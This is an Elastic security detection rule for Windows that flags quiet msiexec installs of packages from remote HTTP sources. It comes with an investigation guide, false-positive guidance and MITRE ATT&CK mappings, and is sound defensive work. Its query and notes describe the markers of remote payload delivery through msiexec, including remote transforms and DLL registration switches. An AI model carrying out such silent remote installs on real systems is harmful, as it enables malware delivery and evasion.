Potential Remote Install via MsiExec

  1[metadata]
  2creation_date = "2025/08/19"
  3integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"]
  4maturity = "production"
  5updated_date = "2026/04/30"
  6
  7[rule]
  8author = ["Elastic"]
  9description = """
 10Identifies attempts to install a file from a remote server using MsiExec. Adversaries may abuse Windows Installers
 11for initial access and delivery of malware.
 12"""
 13from = "now-9m"
 14index = [
 15    "endgame-*",
 16    "logs-crowdstrike.fdr*",
 17    "logs-endpoint.events.process-*",
 18    "logs-m365_defender.event-*",
 19    "logs-sentinel_one_cloud_funnel.*",
 20    "logs-system.security*",
 21    "logs-windows.forwarded*",
 22    "logs-windows.sysmon_operational-*",
 23    "winlogbeat-*",
 24]
 25language = "eql"
 26license = "Elastic License v2"
 27name = "Potential Remote Install via MsiExec"
 28risk_score = 73
 29rule_id = "c9847fe9-3bed-4e6b-b319-f9956d6dd02a"
 30severity = "high"
 31tags = [
 32    "Domain: Endpoint",
 33    "OS: Windows",
 34    "Use Case: Threat Detection",
 35    "Tactic: Defense Evasion",
 36    "Data Source: Elastic Endgame",
 37    "Data Source: Elastic Defend",
 38    "Data Source: Windows Security Event Logs",
 39    "Data Source: Microsoft Defender XDR",
 40    "Data Source: Sysmon",
 41    "Data Source: SentinelOne",
 42    "Data Source: Crowdstrike",
 43    "Resources: Investigation Guide",
 44]
 45timestamp_override = "event.ingested"
 46type = "eql"
 47
 48query = '''
 49process where host.os.type == "windows" and event.type == "start" and
 50  process.name : "msiexec.exe" and process.args : ("-i*", "/i*", "-p*", "/p*") and
 51  process.command_line : ("*http:*", "*https:*") and
 52  process.args : ("/qn", "-qn", "-q", "/q", "/quiet") and
 53  process.parent.name : (
 54    "sihost.exe", "explorer.exe", "cmd.exe", "wscript.exe", "mshta.exe",
 55    "powershell.exe", "wmiprvse.exe", "pcalua.exe", "forfiles.exe", "conhost.exe"
 56  ) and
 57
 58  not process.command_line : (
 59        "*--set-server=*", "*UPGRADEADD=*" , "*--url=*", "*USESERVERCONFIG=*", "*RCTENTERPRISESERVER=*",
 60        "*app.ninjarmm.com*", "*zoom.us/client*", "*SUPPORTSERVERSTSURI=*", "*START_URL=*", "*AUTOCONFIG=*",
 61        "*awscli.amazonaws.com*", "*/i \"C:*", "*/i C:\\*"
 62  )
 63'''
 64
 65note = """## Triage and analysis
 66
 67### Investigating Potential Remote Install via MsiExec
 68#### Possible investigation steps
 69
 70- What remote installer behavior is preserved in the alert?
 71  - Focus: `process.command_line`, `process.parent.name`, and `process.parent.command_line`, especially quiet install or patch switches, the remote MSI or `TRANSFORMS=` source, and HTTP, raw-IP, public-hosting, or recognized distribution sources.
 72  - Implication: escalate for quiet remote installs, remote MSTs, or patches from suspicious infrastructure under interactive or script-launcher parents; lower concern only when the command, source, and parent match one recurring deployment, repair, or onboarding pattern.
 73
 74- Is the msiexec binary identity expected for Windows Installer?
 75  - Focus: `process.executable`, `process.pe.original_file_name`, `process.code_signature.subject_name`, `process.code_signature.trusted`, and `process.hash.sha256`.
 76  - Implication: escalate faster when msiexec is renamed, unsigned, untrusted, newly seen, or in a user-writable path; trusted Microsoft identity only confirms the proxy binary, not the remote install.
 77
 78- Does the parent and ancestry explain why msiexec ran?
 79  - Focus: `process.parent.executable`, `process.parent.command_line`, `process.Ext.ancestry`, `user.id`, and the affected host.
 80  - Implication: escalate when browser-adjacent, script, shell, WMI, or unusual interactive ancestry invokes the remote package without a stable workflow; lower concern when the parent, user, and host pattern fits a recognized management or support path.
 81
 82- Do process events show payload execution after the installer starts?
 83  - Focus: child starts on the same `host.id` where `process.parent.entity_id` matches `process.entity_id`, checking child `process.command_line`, `process.executable`, and `process.hash.sha256`. $investigate_0
 84  - Hint: use `host.id` + `process.pid` + tight alert window only when entity linkage is unavailable, and treat the result as weaker.
 85  - Implication: escalate when msiexec spawns shells, script interpreters, LOLBins, scheduled-task tools, or user-space binaries tied to the remote package; lower concern when follow-on activity stays inside the same signed product install flow.
 86
 87- Does the remote source and workflow context fit one legitimate package path?
 88  - Focus: URL, host, package name, or remote `TRANSFORMS=` in `process.command_line`, plus `process.parent.executable`, `user.id`, and `host.id` context for that source.
 89  - Hint: if network or file telemetry exists, correlate destination or artifact evidence with `host.id` + `process.entity_id`; use `host.id` + `process.pid` + tight alert window only without entity linkage. Missing file or network telemetry is unresolved, not benign, and does not block escalation when process evidence is strong. $investigate_1
 90  - Implication: escalate when the source is raw IPs, public file hosting, look-alike vendors, temp/download staging, or infrastructure unrelated to the expected product; lower concern when source, launcher, user-host scope, and recovered corroboration fit one internal distribution point or vendor service.
 91
 92- Escalate on suspicious quiet-install intent, mismatched identity or lineage, unfit package source, or payload child execution; close only when process evidence and recovered corroboration align to one exact deployment, repair, or support workflow; preserve and escalate when evidence is mixed or visibility is incomplete. Use same-user or same-host related alerts after escalation only to size scope, not prove the local alert. $investigate_2 $investigate_3
 93
 94### False positive analysis
 95
 96- First check whether `http:` or `https:` follows `/i` or `/p` directly (remote source -- investigate) or sits inside a `PROPERTY=` value while the MSI source is local or relative (configuration URL -- likely benign). The rule excludes local `C:\\` sources after `/i`; UNC, relative-path, or other local sources with property URLs need manual confirmation or customer-side exceptions.
 97- Legitimate deployment, patching, or agent-repair workflows can use quiet remote msiexec. Confirm when `process.command_line`, `process.parent.executable`, `user.id`, and `host.id` align to one recurring product path. Do not close on a vendor-looking URL, signed msiexec, or familiar parent name alone.
 98- Build exceptions from `process.parent.executable`, package source pattern in `process.command_line`, and stable `host.id` or `user.id` cohort. Avoid exceptions on msiexec, `process.parent.name`, domain suffix, or `user.name` alone.
 99
100### Response and remediation
101
102- If confirmed benign, reverse any temporary containment and record the installer command, remote package source, parent launcher, signer/hash identity, affected `user.id`, affected `host.id`, and any recovered destination or artifact pattern. Create an exception only after the same workflow recurs across prior alerts from this rule.
103- If suspicious but unconfirmed, preserve the alert record, process tree, `process.entity_id` values, installer command line, remote URL or `TRANSFORMS=` value, parent command line, child process records, and any recovered package, destination, or provenance artifacts before containment. Apply reversible controls only when command, parent, or child-process evidence suggests active delivery; otherwise keep evidence collection open rather than starting cleanup.
104- If confirmed malicious, preserve process identifiers, command lines, recovered packages, and destination indicators before isolating the host, terminating msiexec or follow-on payloads, blocking confirmed indicators, or removing staged installers, extracted payloads, persistence changes, or scheduled-task material tied to the chain.
105- Post-incident hardening: close the delivery path that introduced the remote package, restrict msiexec remote-install use to controlled deployment tooling where feasible, review hosts where installer-elevation policy would increase impact, and document adjacent variants such as remote `TRANSFORMS=` abuse or DLL registration through `/y` and `/z`.
106"""
107
108setup = """## Setup
109
110This rule is designed for data generated by [Elastic Defend](https://www.elastic.co/security/endpoint-security), which provides native endpoint detection and response, along with event enrichments designed to work with our detection rules.
111
112Setup instructions: https://ela.st/install-elastic-defend
113
114### Additional data sources
115
116This rule also supports the following third-party data sources. For setup instructions, refer to the links below:
117
118- [CrowdStrike](https://ela.st/crowdstrike-integration)
119- [Microsoft Defender XDR](https://ela.st/m365-defender)
120- [SentinelOne Cloud Funnel](https://ela.st/sentinel-one-cloud-funnel)
121- [Sysmon Event ID 1 - Process Creation](https://ela.st/sysmon-event-1-setup)
122- [Windows Process Creation Logs](https://ela.st/audit-process-creation)
123"""
124
125[rule.investigation_fields]
126field_names = [
127    "@timestamp",
128    "host.id",
129    "user.id",
130    "process.entity_id",
131    "process.pid",
132    "process.executable",
133    "process.command_line",
134    "process.args",
135    "process.hash.sha256",
136    "process.parent.entity_id",
137    "process.parent.executable",
138    "process.parent.command_line",
139    "process.pe.original_file_name",
140    "process.code_signature.subject_name",
141    "process.code_signature.trusted",
142]
143
144[transform]
145
146[[transform.investigate]]
147label = "Child process activity from msiexec"
148description = ""
149providers = [
150  [
151    { excluded = false, field = "host.id", queryType = "phrase", value = "{{host.id}}", valueType = "string" },
152    { excluded = false, field = "process.parent.entity_id", queryType = "phrase", value = "{{process.entity_id}}", valueType = "string" },
153    { excluded = false, field = "event.category", queryType = "phrase", value = "process", valueType = "string" },
154    { excluded = false, field = "event.type", queryType = "phrase", value = "start", valueType = "string" }
155  ]
156]
157relativeFrom = "now-1h"
158relativeTo = "now"
159
160[[transform.investigate]]
161label = "File or network activity by msiexec"
162description = ""
163providers = [
164  [
165    { excluded = false, field = "host.id", queryType = "phrase", value = "{{host.id}}", valueType = "string" },
166    { excluded = false, field = "process.entity_id", queryType = "phrase", value = "{{process.entity_id}}", valueType = "string" },
167    { excluded = false, field = "event.category", queryType = "phrase", value = "file", valueType = "string" }
168  ],
169  [
170    { excluded = false, field = "host.id", queryType = "phrase", value = "{{host.id}}", valueType = "string" },
171    { excluded = false, field = "process.entity_id", queryType = "phrase", value = "{{process.entity_id}}", valueType = "string" },
172    { excluded = false, field = "event.category", queryType = "phrase", value = "network", valueType = "string" }
173  ]
174]
175relativeFrom = "now-1h"
176relativeTo = "now"
177
178[[transform.investigate]]
179label = "Alerts associated with the user"
180description = ""
181providers = [
182  [
183    { excluded = false, field = "event.kind", queryType = "phrase", value = "signal", valueType = "string" },
184    { excluded = false, field = "user.id", queryType = "phrase", value = "{{user.id}}", valueType = "string" }
185  ]
186]
187relativeFrom = "now-48h/h"
188relativeTo = "now"
189
190[[transform.investigate]]
191label = "Alerts associated with the host"
192description = ""
193providers = [
194  [
195    { excluded = false, field = "event.kind", queryType = "phrase", value = "signal", valueType = "string" },
196    { excluded = false, field = "host.id", queryType = "phrase", value = "{{host.id}}", valueType = "string" }
197  ]
198]
199relativeFrom = "now-48h/h"
200relativeTo = "now"
201
202[[rule.threat]]
203framework = "MITRE ATT&CK"
204[[rule.threat.technique]]
205id = "T1218"
206name = "System Binary Proxy Execution"
207reference = "https://attack.mitre.org/techniques/T1218/"
208[[rule.threat.technique.subtechnique]]
209id = "T1218.007"
210name = "Msiexec"
211reference = "https://attack.mitre.org/techniques/T1218/007/"
212
213[rule.threat.tactic]
214id = "TA0005"
215name = "Defense Evasion"
216reference = "https://attack.mitre.org/tactics/TA0005/"
217
218[[rule.threat]]
219framework = "MITRE ATT&CK"
220
221[[rule.threat.technique]]
222id = "T1105"
223name = "Ingress Tool Transfer"
224reference = "https://attack.mitre.org/techniques/T1105/"
225
226[rule.threat.tactic]
227id = "TA0011"
228name = "Command and Control"
229reference = "https://attack.mitre.org/tactics/TA0011/"